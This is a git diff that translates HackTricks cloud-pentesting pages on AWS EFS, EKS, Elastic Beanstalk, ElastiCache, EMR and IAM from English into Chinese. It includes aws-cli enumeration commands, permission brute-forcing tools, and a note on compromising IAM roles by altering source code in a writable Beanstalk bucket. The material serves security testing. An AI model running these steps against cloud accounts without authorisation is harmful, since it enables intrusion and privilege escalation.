"efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", +"Statement": [ +{ +"Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "", +"Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", +"Condition": { +"Bool": { +"elasticfilesystem:AccessedViaMountTarget": "true" +} +} +} +] } ``` - -Or this will **prevent anonymous access**: +或者这将**防止匿名访问**:
-Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command: - +请注意,要挂载受 IAM 保护的文件系统,您必须在挂载命令中使用类型 "efs": ```bash sudo mkdir /efs sudo mount -t efs -o tls,iam :/ /efs/ # To use a different pforile from ~/.aws/credentials # You can use: -o tls,iam,awsprofile=namedprofile ``` - ### Access Points -**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets. +**访问点**是**特定于应用程序**的入口点**进入EFS文件系统**,使管理应用程序对共享数据集的访问变得更容易。 -When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data. - -**You can mount the File System from an access point with something like:** +当您创建访问点时,您可以**指定通过访问点创建的文件和目录的所有者和POSIX权限**。您还可以**为访问点定义自定义根目录**,可以通过指定现有目录或创建一个具有所需权限的新目录来实现。这使您能够**按应用程序或用户控制对EFS文件系统的访问**,从而更容易管理和保护您的共享文件数据。 +**您可以通过访问点挂载文件系统,例如:** ```bash # Use IAM if you need to use iam permissions sudo mount -t efs -o tls,[iam],accesspoint= \ - /efs/ + /efs/ ``` - > [!WARNING] -> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. +> 请注意,即使尝试挂载访问点,您仍然需要能够**通过网络联系NFS服务**,如果EFS有文件系统**策略**,您需要**足够的IAM权限**来挂载它。 -Access points can be used for the following purposes: +访问点可以用于以下目的: -- **Simplify permissions management**: By defining a POSIX user and group for each access point, you can easily manage access permissions for different applications or users without modifying the underlying file system's permissions. -- **Enforce a root directory**: Access points can restrict access to a specific directory within the EFS file system, ensuring that each application or user operates within its designated folder. This helps prevent accidental data exposure or modification. -- **Easier file system access**: Access points can be associated with an AWS Lambda function or an AWS Fargate task, simplifying file system access for serverless and containerized applications. +- **简化权限管理**:通过为每个访问点定义一个POSIX用户和组,您可以轻松管理不同应用程序或用户的访问权限,而无需修改底层文件系统的权限。 +- **强制根目录**:访问点可以限制对EFS文件系统中特定目录的访问,确保每个应用程序或用户在其指定的文件夹内操作。这有助于防止意外的数据泄露或修改。 +- **更容易的文件系统访问**:访问点可以与AWS Lambda函数或AWS Fargate任务关联,简化无服务器和容器化应用程序的文件系统访问。 ## Privesc @@ -142,7 +132,3 @@ Access points can be used for the following purposes: {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md index a7ead6d10..3102a382f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-eks-enum.md @@ -4,17 +4,16 @@ ## EKS -Amazon Elastic Kubernetes Service (Amazon EKS) is designed to eliminate the need for users to install, operate, and manage their own Kubernetes control plane or nodes. Instead, Amazon EKS manages these components, providing a simplified way to deploy, manage, and scale containerized applications using Kubernetes on AWS. +亚马逊弹性Kubernetes服务(Amazon EKS)旨在消除用户安装、操作和管理自己的Kubernetes控制平面或节点的需求。相反,Amazon EKS 管理这些组件,提供了一种简化的方式来在AWS上使用Kubernetes部署、管理和扩展容器化应用程序。 -Key aspects of Amazon EKS include: +Amazon EKS的关键方面包括: -1. **Managed Kubernetes Control Plane**: Amazon EKS automates critical tasks such as patching, node provisioning, and updates. -2. **Integration with AWS Services**: It offers seamless integration with AWS services for compute, storage, database, and security. -3. **Scalability and Security**: Amazon EKS is designed to be highly available and secure, providing features such as automatic scaling and isolation by design. -4. **Compatibility with Kubernetes**: Applications running on Amazon EKS are fully compatible with applications running on any standard Kubernetes environment. +1. **托管Kubernetes控制平面**:Amazon EKS自动化关键任务,如修补、节点配置和更新。 +2. **与AWS服务的集成**:它与计算、存储、数据库和安全的AWS服务无缝集成。 +3. **可扩展性和安全性**:Amazon EKS旨在高度可用和安全,提供自动扩展和设计隔离等功能。 +4. **与Kubernetes的兼容性**:在Amazon EKS上运行的应用程序与在任何标准Kubernetes环境中运行的应用程序完全兼容。 #### Enumeration - ```bash aws eks list-clusters aws eks describe-cluster --name @@ -32,19 +31,14 @@ aws eks describe-nodegroup --cluster-name --nodegroup-name aws eks list-updates --name aws eks describe-update --name --update-id ``` - -#### Post Exploitation +#### 后期利用 {{#ref}} ../aws-post-exploitation/aws-eks-post-exploitation.md {{#endref}} -## References +## 参考 - [https://aws.amazon.com/eks/](https://aws.amazon.com/eks/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md index 980504dac..517964bf7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elastic-beanstalk-enum.md @@ -4,70 +4,69 @@ ## Elastic Beanstalk -Amazon Elastic Beanstalk provides a simplified platform for **deploying, managing, and scaling web applications and services**. It supports a variety of programming languages and frameworks, such as Java, .NET, PHP, Node.js, Python, Ruby, and Go, as well as Docker containers. The service is compatible with widely-used servers including Apache, Nginx, Passenger, and IIS. +亚马逊 Elastic Beanstalk 提供了一个简化的平台,用于 **部署、管理和扩展 Web 应用程序和服务**。它支持多种编程语言和框架,如 Java、.NET、PHP、Node.js、Python、Ruby 和 Go,以及 Docker 容器。该服务与广泛使用的服务器兼容,包括 Apache、Nginx、Passenger 和 IIS。 -Elastic Beanstalk provides a simple and flexible way to **deploy your applications to the AWS cloud**, without the need to worry about the underlying infrastructure. It **automatically** handles the details of capacity **provisioning**, load **balancing**, **scaling**, and application health **monitoring**, allowing you to focus on writing and deploying your code. +Elastic Beanstalk 提供了一种简单灵活的方式来 **将您的应用程序部署到 AWS 云**,无需担心底层基础设施。它 **自动** 处理容量 **配置**、负载 **均衡**、**扩展** 和应用程序健康 **监控** 的细节,让您专注于编写和部署代码。 -The infrastructure created by Elastic Beanstalk is managed by **Autoscaling** Groups in **EC2** (with a load balancer). Which means that at the end of the day, if you **compromise the host**, you should know about about EC2: +Elastic Beanstalk 创建的基础设施由 **自动扩展** 组在 **EC2** 中管理(带有负载均衡器)。这意味着,最终,如果您 **妥协主机**,您应该了解 EC2: {{#ref}} aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/ {{#endref}} -Moreover, if Docker is used, it’s possible to use **ECS**. +此外,如果使用 Docker,可以使用 **ECS**。 {{#ref}} aws-eks-enum.md {{#endref}} -### Application & Environments +### 应用程序与环境 -In AWS Elastic Beanstalk, the concepts of an "application" and an "environment" serve different purposes and have distinct roles in the deployment process. +在 AWS Elastic Beanstalk 中,“应用程序”和“环境”的概念服务于不同的目的,并在部署过程中具有不同的角色。 -#### Application +#### 应用程序 -- An application in Elastic Beanstalk is a **logical container for your application's source code, environments, and configurations**. It groups together different versions of your application code and allows you to manage them as a single entity. -- When you create an application, you provide a name and **description, but no resources are provisioned** at this stage. it is simply a way to organize and manage your code and related resources. -- You can have **multiple application versions** within an application. Each version corresponds to a specific release of your code, which can be deployed to one or more environments. +- Elastic Beanstalk 中的应用程序是一个 **逻辑容器,用于存放您的应用程序源代码、环境和配置**。它将不同版本的应用程序代码组合在一起,并允许您将其作为一个实体进行管理。 +- 创建应用程序时,您提供一个名称和 **描述,但此时不会配置任何资源**。这只是组织和管理代码及相关资源的一种方式。 +- 您可以在一个应用程序中拥有 **多个应用程序版本**。每个版本对应于代码的特定发布,可以部署到一个或多个环境中。 -#### Environment +#### 环境 -- An environment is a **provisioned instance of your application** running on AWS infrastructure. It is **where your application code is deployed and executed**. Elastic Beanstalk provisions the necessary resources (e.g., EC2 instances, load balancers, auto-scaling groups, databases) based on the environment configuration. -- **Each environment runs a single version of your application**, and you can have multiple environments for different purposes, such as development, testing, staging, and production. -- When you create an environment, you choose a platform (e.g., Java, .NET, Node.js, etc.) and an environment type (e.g., web server or worker). You can also customize the environment configuration to control various aspects of the infrastructure and application settings. +- 环境是一个 **在 AWS 基础设施上运行的应用程序的配置实例**。它是 **您的应用程序代码被部署和执行的地方**。Elastic Beanstalk 根据环境配置配置所需的资源(例如,EC2 实例、负载均衡器、自动扩展组、数据库)。 +- **每个环境运行您应用程序的单个版本**,您可以为不同的目的(例如开发、测试、预发布和生产)拥有多个环境。 +- 创建环境时,您选择一个平台(例如 Java、.NET、Node.js 等)和环境类型(例如 Web 服务器或工作者)。您还可以自定义环境配置,以控制基础设施和应用程序设置的各个方面。 -### 2 types of Environments +### 2 种环境类型 -1. **Web Server Environment**: It is designed to **host and serve web applications and APIs**. These applications typically handle incoming HTTP/HTTPS requests. The web server environment provisions resources such as **EC2 instances, load balancers, and auto-scaling** groups to handle incoming traffic, manage capacity, and ensure the application's high availability. -2. **Worker Environment**: It is designed to process **background tasks**, which are often time-consuming or resource-intensive operations that don't require immediate responses to clients. The worker environment provisions resources like **EC2 instances and auto-scaling groups**, but it **doesn't have a load balancer** since it doesn't handle HTTP/HTTPS requests directly. Instead, it consumes tasks from an **Amazon Simple Queue Service (SQS) queue**, which acts as a buffer between the worker environment and the tasks it processes. +1. **Web 服务器环境**:旨在 **托管和提供 Web 应用程序和 API**。这些应用程序通常处理传入的 HTTP/HTTPS 请求。Web 服务器环境配置资源,如 **EC2 实例、负载均衡器和自动扩展** 组,以处理传入流量、管理容量并确保应用程序的高可用性。 +2. **工作者环境**:旨在处理 **后台任务**,这些任务通常是耗时或资源密集型的操作,不需要立即响应客户端。工作者环境配置资源,如 **EC2 实例和自动扩展组**,但它 **没有负载均衡器**,因为它不直接处理 HTTP/HTTPS 请求。相反,它从 **Amazon Simple Queue Service (SQS) 队列** 中消费任务,该队列充当工作者环境与其处理的任务之间的缓冲区。 -### Security +### 安全 -When creating an App in Beanstalk there are 3 very important security options to choose: +在 Beanstalk 中创建应用时,有 3 个非常重要的安全选项可供选择: -- **EC2 key pair**: This will be the **SSH key** that will be able to access the EC2 instances running the app -- **IAM instance profile**: This is the **instance profile** that the instances will have (**IAM privileges**) - - The autogenerated role is called **`aws-elasticbeanstalk-ec2-role`** and has some interesting access over all ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk S3 using the AWS managed policies: [AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier), [AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker), [AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier). -- **Service role**: This is the **role that the AWS service** will use to perform all the needed actions. Afaik, a regular AWS user cannot access that role. - - This role generated by AWS is called **`aws-elasticbeanstalk-service-role`** and uses the AWS managed policies [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) and [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) +- **EC2 密钥对**:这将是能够访问运行应用的 EC2 实例的 **SSH 密钥**。 +- **IAM 实例配置文件**:这是实例将拥有的 **实例配置文件**(**IAM 权限**)。 +- 自动生成的角色称为 **`aws-elasticbeanstalk-ec2-role`**,并对所有 ECS、所有 SQS、DynamoDB elasticbeanstalk 和 elasticbeanstalk S3 拥有一些有趣的访问权限,使用 AWS 管理的策略:[AWSElasticBeanstalkWebTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWebTier)、[AWSElasticBeanstalkMulticontainerDocker](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkMulticontainerDocker)、[AWSElasticBeanstalkWorkerTier](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/AWSElasticBeanstalkWorkerTier)。 +- **服务角色**:这是 **AWS 服务** 将用于执行所有所需操作的 **角色**。据我所知,普通 AWS 用户无法访问该角色。 +- AWS 生成的角色称为 **`aws-elasticbeanstalk-service-role`**,并使用 AWS 管理的策略 [AWSElasticBeanstalkEnhancedHealth](https://us-east-1.console.aws.amazon.com/iam/home#/policies/arn:aws:iam::aws:policy/service-role/AWSElasticBeanstalkEnhancedHealth) 和 [AWSElasticBeanstalkManagedUpdatesCustomerRolePolicy](https://us-east-1.console.aws.amazon.com/iamv2/home?region=us-east-1#/roles/details/aws-elasticbeanstalk-service-role?section=permissions) -By default **metadata version 1 is disabled**: +默认情况下 **元数据版本 1 被禁用**:
-### Exposure +### 暴露 -Beanstalk data is stored in a **S3 bucket** with the following name: **`elasticbeanstalk--`**(if it was created in the AWS console). Inside this bucket you will find the uploaded **source code of the application**. +Beanstalk 数据存储在一个 **S3 存储桶** 中,名称为 **`elasticbeanstalk--`**(如果是在 AWS 控制台中创建的)。在此存储桶中,您将找到上传的 **应用程序源代码**。 -The **URL** of the created webpage is **`http://-env...elasticbeanstalk.com/`** +创建的网页的 **URL** 为 **`http://-env...elasticbeanstalk.com/`** > [!WARNING] -> If you get **read access** over the bucket, you can **read the source code** and even find **sensitive credentials** on it +> 如果您获得 **读取访问权限**,您可以 **读取源代码**,甚至找到 **敏感凭据**。 > -> if you get **write access** over the bucket, you could **modify the source code** to **compromise** the **IAM role** the application is using next time it's executed. - -### Enumeration +> 如果您获得 **写入访问权限**,您可以 **修改源代码**,以 **妥协** 应用程序下次执行时使用的 **IAM 角色**。 +### 枚举 ```bash # Find S3 bucket ACCOUNT_NUMBER= @@ -85,33 +84,28 @@ aws elasticbeanstalk describe-instances-health --environment-name # G # Get events aws elasticbeanstalk describe-events ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-elastic-beanstalk-unauthenticated-enum.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-elastic-beanstalk-persistence.md {{#endref}} -### Privesc +### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-elastic-beanstalk-privesc.md {{#endref}} -### Post Exploitation +### 利用后的操作 {{#ref}} ../aws-post-exploitation/aws-elastic-beanstalk-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md index 6305fcc91..eb00aa2d7 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-elasticache.md @@ -4,10 +4,9 @@ ## ElastiCache -AWS ElastiCache is a fully **managed in-memory data store and cache service** that provides high-performance, low-latency, and scalable solutions for applications. It supports two popular open-source in-memory engines: **Redis and Memcached**. ElastiCache **simplifies** the **setup**, **management**, and **maintenance** of these engines, allowing developers to offload time-consuming tasks such as provisioning, patching, monitoring, and **backups**. +AWS ElastiCache 是一个完全**托管的内存数据存储和缓存服务**,为应用程序提供高性能、低延迟和可扩展的解决方案。它支持两个流行的开源内存引擎:**Redis 和 Memcached**。ElastiCache **简化**了这些引擎的**设置**、**管理**和**维护**,使开发人员能够卸载诸如配置、打补丁、监控和**备份**等耗时任务。 ### Enumeration - ```bash # ElastiCache clusters ## Check the SecurityGroups to later check who can access @@ -39,11 +38,6 @@ aws elasticache describe-users # List ElastiCache events aws elasticache describe-events ``` - ### Privesc (TODO) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md index b05012f3e..22bcfb484 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-emr-enum.md @@ -4,38 +4,37 @@ ## EMR -AWS's Elastic MapReduce (EMR) service, starting from version 4.8.0, introduced a **security configuration** feature that enhances data protection by allowing users to specify encryption settings for data at rest and in transit within EMR clusters, which are scalable groups of EC2 instances designed to process big data frameworks like Apache Hadoop and Spark. +AWS的弹性MapReduce(EMR)服务,从版本4.8.0开始,引入了**安全配置**功能,通过允许用户为EMR集群中的静态和动态数据指定加密设置,从而增强数据保护。EMR集群是可扩展的EC2实例组,旨在处理大数据框架,如Apache Hadoop和Spark。 -Key characteristics include: +主要特点包括: -- **Cluster Encryption Default**: By default, data at rest within a cluster is not encrypted. However, enabling encryption provides access to several features: - - **Linux Unified Key Setup**: Encrypts EBS cluster volumes. Users can opt for AWS Key Management Service (KMS) or a custom key provider. - - **Open-Source HDFS Encryption**: Offers two encryption options for Hadoop: - - Secure Hadoop RPC (Remote Procedure Call), set to privacy, leveraging the Simple Authentication Security Layer. - - HDFS Block transfer encryption, set to true, utilizes the AES-256 algorithm. -- **Encryption in Transit**: Focuses on securing data during transfer. Options include: - - **Open Source Transport Layer Security (TLS)**: Encryption can be enabled by choosing a certificate provider: - - **PEM**: Requires manual creation and bundling of PEM certificates into a zip file, referenced from an S3 bucket. - - **Custom**: Involves adding a custom Java class as a certificate provider that supplies encryption artifacts. +- **集群加密默认**:默认情况下,集群内的静态数据未加密。然而,启用加密可以访问多个功能: +- **Linux统一密钥设置**:加密EBS集群卷。用户可以选择AWS密钥管理服务(KMS)或自定义密钥提供者。 +- **开源HDFS加密**:为Hadoop提供两种加密选项: +- 安全Hadoop RPC(远程过程调用),设置为隐私,利用简单身份验证安全层。 +- HDFS块传输加密,设置为true,使用AES-256算法。 +- **传输中的加密**:专注于在传输过程中保护数据。选项包括: +- **开源传输层安全性(TLS)**:通过选择证书提供者可以启用加密: +- **PEM**:需要手动创建并将PEM证书打包到zip文件中,从S3桶中引用。 +- **自定义**:涉及添加自定义Java类作为证书提供者,提供加密工件。 -Once a TLS certificate provider is integrated into the security configuration, the following application-specific encryption features can be activated, varying based on the EMR version: +一旦将TLS证书提供者集成到安全配置中,可以激活以下特定于应用程序的加密功能,具体取决于EMR版本: -- **Hadoop**: - - Might reduce encrypted shuffle using TLS. - - Secure Hadoop RPC with Simple Authentication Security Layer and HDFS Block Transfer with AES-256 are activated with at-rest encryption. -- **Presto** (EMR version 5.6.0+): - - Internal communication between Presto nodes is secured using SSL and TLS. -- **Tez Shuffle Handler**: - - Utilizes TLS for encryption. -- **Spark**: - - Employs TLS for the Akka protocol. - - Uses Simple Authentication Security Layer and 3DES for Block Transfer Service. - - External shuffle service is secured with the Simple Authentication Security Layer. +- **Hadoop**: +- 可能会减少使用TLS的加密洗牌。 +- 使用简单身份验证安全层的安全Hadoop RPC和使用AES-256的HDFS块传输在静态加密时激活。 +- **Presto**(EMR版本5.6.0+): +- Presto节点之间的内部通信使用SSL和TLS进行安全保护。 +- **Tez Shuffle Handler**: +- 使用TLS进行加密。 +- **Spark**: +- 对Akka协议使用TLS。 +- 对块传输服务使用简单身份验证安全层和3DES。 +- 外部洗牌服务使用简单身份验证安全层进行保护。 -These features collectively enhance the security posture of EMR clusters, especially concerning data protection during storage and transmission phases. +这些功能共同增强了EMR集群的安全态势,特别是在存储和传输阶段的数据保护方面。 #### Enumeration - ```bash aws emr list-clusters aws emr describe-cluster --cluster-id @@ -46,19 +45,14 @@ aws emr list-notebook-executions aws emr list-security-configurations aws emr list-studios #Get studio URLs ``` - -#### Privesc +#### 提权 {{#ref}} ../aws-privilege-escalation/aws-emr-privesc.md {{#endref}} -## References +## 参考 - [https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/](https://cloudacademy.com/course/domain-three-designing-secure-applications-and-architectures/elastic-mapreduce-emr-encryption-1/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md index 7a430cc17..b0f8a4806 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-iam-enum.md @@ -1,20 +1,20 @@ -# AWS - IAM, Identity Center & SSO Enum +# AWS - IAM, 身份中心与 SSO 枚举 {{#include ../../../banners/hacktricks-training.md}} ## IAM -You can find a **description of IAM** in: +您可以在以下位置找到 **IAM 的描述**: {{#ref}} ../aws-basic-information/ {{#endref}} -### Enumeration +### 枚举 -Main permissions needed: +所需的主要权限: -- `iam:ListPolicies`, `iam:GetPolicy` and `iam:GetPolicyVersion` +- `iam:ListPolicies`, `iam:GetPolicy` 和 `iam:GetPolicyVersion` - `iam:ListRoles` - `iam:ListUsers` - `iam:ListGroups` @@ -22,10 +22,9 @@ Main permissions needed: - `iam:ListAttachedUserPolicies` - `iam:ListAttachedRolePolicies` - `iam:ListAttachedGroupPolicies` -- `iam:ListUserPolicies` and `iam:GetUserPolicy` -- `iam:ListGroupPolicies` and `iam:GetGroupPolicy` -- `iam:ListRolePolicies` and `iam:GetRolePolicy` - +- `iam:ListUserPolicies` 和 `iam:GetUserPolicy` +- `iam:ListGroupPolicies` 和 `iam:GetGroupPolicy` +- `iam:ListRolePolicies` 和 `iam:GetRolePolicy` ```bash # All IAMs ## Retrieves information about all IAM users, groups, roles, and policies @@ -89,64 +88,54 @@ aws iam get-account-password-policy aws iam list-mfa-devices aws iam list-virtual-mfa-devices ``` +### 权限暴力破解 -### Permissions Brute Force - -If you are interested in your own permissions but you don't have access to query IAM you could always brute-force them. +如果您对自己的权限感兴趣,但没有权限查询 IAM,您可以尝试暴力破解它们。 #### bf-aws-permissions -The tool [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) is just a bash script that will run using the indicated profile all the **`list*`, `describe*`, `get*`** actions it can find using `aws` cli help messages and **return the successful executions**. - +工具 [**bf-aws-permissions**](https://github.com/carlospolop/bf-aws-permissions) 只是一个 bash 脚本,它将使用指定的配置文件运行所有可以通过 `aws` cli 帮助信息找到的 **`list*`, `describe*`, `get*`** 操作,并 **返回成功的执行结果**。 ```bash # Bruteforce permissions bash bf-aws-permissions.sh -p default > /tmp/bf-permissions-verbose.txt ``` - #### bf-aws-perms-simulate -The tool [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) can find your current permission (or the ones of other principals) if you have the permission **`iam:SimulatePrincipalPolicy`** - +工具 [**bf-aws-perms-simulate**](https://github.com/carlospolop/bf-aws-perms-simulate) 可以找到您当前的权限(或其他主体的权限),前提是您拥有权限 **`iam:SimulatePrincipalPolicy`** ```bash # Ask for permissions python3 aws_permissions_checker.py --profile [--arn ] ``` - #### Perms2ManagedPolicies -If you found **some permissions your user has**, and you think that they are being granted by a **managed AWS role** (and not by a custom one). You can use the tool [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) to check all the **AWS managed roles that grants the permissions you discovered that you have**. - +如果你发现**你的用户拥有某些权限**,并且你认为这些权限是由**托管的 AWS 角色**授予的(而不是自定义角色)。你可以使用工具 [**aws-Perms2ManagedRoles**](https://github.com/carlospolop/aws-Perms2ManagedPolicies) 来检查所有**授予你发现的权限的 AWS 托管角色**。 ```bash # Run example with my profile python3 aws-Perms2ManagedPolicies.py --profile myadmin --permissions-file example-permissions.txt ``` - > [!WARNING] -> It's possible to "know" if the permissions you have are granted by an AWS managed role if you see that **you have permissions over services that aren't used** for example. +> 如果您看到**您对未使用的服务拥有权限**,则可以“知道”您拥有的权限是由AWS托管角色授予的。 #### Cloudtrail2IAM -[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) is a Python tool that analyses **AWS CloudTrail logs to extract and summarize actions** done by everyone or just an specific user or role. The tool will **parse every cloudtrail log from the indicated bucket**. - +[**CloudTrail2IAM**](https://github.com/carlospolop/Cloudtrail2IAM) 是一个Python工具,用于分析**AWS CloudTrail日志以提取和总结**所有人或特定用户或角色所执行的操作。该工具将**解析指定存储桶中的每个cloudtrail日志**。 ```bash git clone https://github.com/carlospolop/Cloudtrail2IAM cd Cloudtrail2IAM pip install -r requirements.txt python3 cloudtrail2IAM.py --prefix PREFIX --bucket_name BUCKET_NAME --profile PROFILE [--filter-name FILTER_NAME] [--threads THREADS] ``` - > [!WARNING] -> If you find .tfstate (Terraform state files) or CloudFormation files (these are usually yaml files located inside a bucket with the prefix cf-templates), you can also read them to find aws configuration and find which permissions have been assigned to who. +> 如果你找到 .tfstate(Terraform 状态文件)或 CloudFormation 文件(这些通常是位于以 cf-templates 为前缀的桶中的 yaml 文件),你也可以读取它们以查找 aws 配置并找出哪些权限被分配给了谁。 #### enumerate-iam -To use the tool [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam) you first need to download all the API AWS endpoints, from those the script **`generate_bruteforce_tests.py`** will get all the **"list\_", "describe\_", and "get\_" endpoints.** And finally, it will try to **access them** with the given credentials and **indicate if it worked**. +要使用工具 [**https://github.com/andresriancho/enumerate-iam**](https://github.com/andresriancho/enumerate-iam),你首先需要下载所有的 API AWS 端点,从中脚本 **`generate_bruteforce_tests.py`** 将获取所有的 **"list\_", "describe\_", 和 "get\_" 端点。** 最后,它将尝试 **使用给定的凭据访问它们** 并 **指示是否成功**。 -(In my experience the **tool hangs at some point**, [**checkout this fix**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) to try to fix that). +(根据我的经验,**该工具在某些时候会挂起**, [**查看此修复**](https://github.com/andresriancho/enumerate-iam/pull/15/commits/77ad5b41216e3b5f1511d0c385da8cd5984c2d3c) 尝试修复这个问题)。 > [!WARNING] -> In my experience this tool is like the previous one but working worse and checking less permissions - +> 根据我的经验,这个工具与前一个工具类似,但工作效果更差,检查的权限更少。 ```bash # Install tool git clone git@github.com:andresriancho/enumerate-iam.git @@ -163,11 +152,9 @@ cd .. # Enumerate permissions python3 enumerate-iam.py --access-key ACCESS_KEY --secret-key SECRET_KEY [--session-token SESSION_TOKEN] [--region REGION] ``` - #### weirdAAL -You could also use the tool [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki). This tool will check **several common operations on several common services** (will check some enumeration permissions and also some privesc permissions). But it will only check the coded checks (the only way to check more stuff if coding more tests). - +您还可以使用工具 [**weirdAAL**](https://github.com/carnal0wnage/weirdAAL/wiki)。该工具将检查 **多个常见服务上的几个常见操作**(将检查一些枚举权限和一些权限提升权限)。但它只会检查编码的检查(检查更多内容的唯一方法是编写更多测试)。 ```bash # Install git clone https://github.com/carnal0wnage/weirdAAL.git @@ -191,12 +178,10 @@ python3 weirdAAL.py -m recon_all -t MyTarget # Check all permissions # [+] elbv2 Actions allowed are [+] # ['DescribeLoadBalancers', 'DescribeAccountLimits', 'DescribeTargetGroups'] ``` - -#### Hardening Tools to BF permissions +#### 加固工具以 BF 权限 {{#tabs }} {{#tab name="CloudSploit" }} - ```bash # Export env variables ./index.js --console=text --config ./config.js --json /tmp/out-cloudsploit.json @@ -207,11 +192,9 @@ jq 'map(select(.status | contains("UNKNOWN") | not))' /tmp/out-cloudsploit.json # Get services by regions jq 'group_by(.region) | map({(.[0].region): ([map((.resource | split(":"))[2]) | unique])})' ~/Desktop/pentests/cere/greybox/core-dev-dev-cloudsploit-filtered.json ``` - {{#endtab }} {{#tab name="SteamPipe" }} - ```bash # https://github.com/turbot/steampipe-mod-aws-insights steampipe check all --export=json @@ -220,50 +203,48 @@ steampipe check all --export=json # In this case you cannot output to JSON, so heck it in the dashboard steampipe dashboard ``` - {{#endtab }} {{#endtabs }} #### \ -Neither of the previous tools is capable of checking close to all permissions, so if you know a better tool send a PR! +之前的工具都无法检查所有权限,因此如果你知道更好的工具,请发送 PR! -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-iam-and-sts-unauthenticated-enum.md {{#endref}} -### Privilege Escalation +### 权限提升 -In the following page you can check how to **abuse IAM permissions to escalate privileges**: +在以下页面中,你可以查看如何**滥用 IAM 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-iam-privesc.md {{#endref}} -### IAM Post Exploitation +### IAM 后期利用 {{#ref}} ../aws-post-exploitation/aws-iam-post-exploitation.md {{#endref}} -### IAM Persistence +### IAM 持久性 {{#ref}} ../aws-persistence/aws-iam-persistence.md {{#endref}} -## IAM Identity Center +## IAM 身份中心 -You can find a **description of IAM Identity Center** in: +你可以在以下位置找到**IAM 身份中心的描述**: {{#ref}} ../aws-basic-information/ {{#endref}} -### Connect via SSO with CLI - +### 通过 SSO 使用 CLI 连接 ```bash # Connect with sso via CLI aws configure sso aws configure sso @@ -274,20 +255,18 @@ sso_account_id = sso_role_name = AdministratorAccess sso_region = us-east-1 ``` - ### Enumeration -The main elements of the Identity Center are: +身份中心的主要元素包括: -- Users and groups -- Permission Sets: Have policies attached -- AWS Accounts +- 用户和组 +- 权限集:附加了策略 +- AWS 